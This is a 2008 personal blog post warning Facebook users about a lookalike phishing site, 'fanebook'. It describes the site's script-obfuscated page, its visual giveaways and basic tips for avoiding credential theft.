Pi’s Blog

My blog about Thunderbird and GSoC 2008

Facebook phishing warning

On Facebook I’ve started to see and receive a ton of new spam from friends whose accounts have been hijacked.  I went on one of the phishing sites and was amazed at how similar it looks to Facebook.  I noticed immediately that, when I saw nothing (thank you NoScript – link below), the contents are written through JavaScript through document.write(unescape(…..)).  fanebook, a phishing site, writes the entire page’s contents through JavaScript.  Of course, it is escaped, so unless you can unescape all that in your head, you have to unescape it through JavaScript to see what it really writes:

Click here to see a text file with the HTML commented out

Then I wondered, whois fanebook.com (

Click here to see the results


The similarities in appearance between the phishing site login and facebook’s are remarkable, but it looks like fanebook is a little behind, as the page appears to be from February 07, 2008.


Notice the incorrect URL, copyright date, footer and the presence of the Tour link; the source is also a dead giveaway.  It links to the real facebook.com in several places.


How to avoid falling for a Facebook phishing scam

  • Don’t go to links posted by people on your wall, especially if you go to their profile and they have sent the same message to several other people.
  • http://www.facebook.com.xxxxxxxxx.xxxxxxxxxxx.cn is not a facebook site
  • Use some kind of phishing filter or related extension like WOT for FirefoxNoScript can help, as well.
  • If you already logged into Facebook and see a prompt to login again, don’t.
  • If you think that your account was hijacked, make a new password immediately.  Sometimes the phishing sites redirect you to Facebook itself so you think you logged in successfully.
  • Always check the URL before entering your credentials
  • You can use a password manager (but not Internet Explorer’s) that will enter in your password automatically.  If you see a site that looks like facebook but Firefox doesn’t fill in your password, than it is fake.
  • If you suspect it is a fake, don’t sign in, or at least look at the source code first.  If it looks completely unintelligible then it is fake.

August 16, 2008 - Posted by | Uncategorized | , ,

1 Comment »

  1. […] (Here are a few other examples of warnings at Weblog.com.np, hem.com and Pi’s blog. […]

    Pingback by Matt Bigelow » Blog Archive » Watch out for the ‘Fanebook’ Facebook forgery | August 18, 2008 | Reply

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: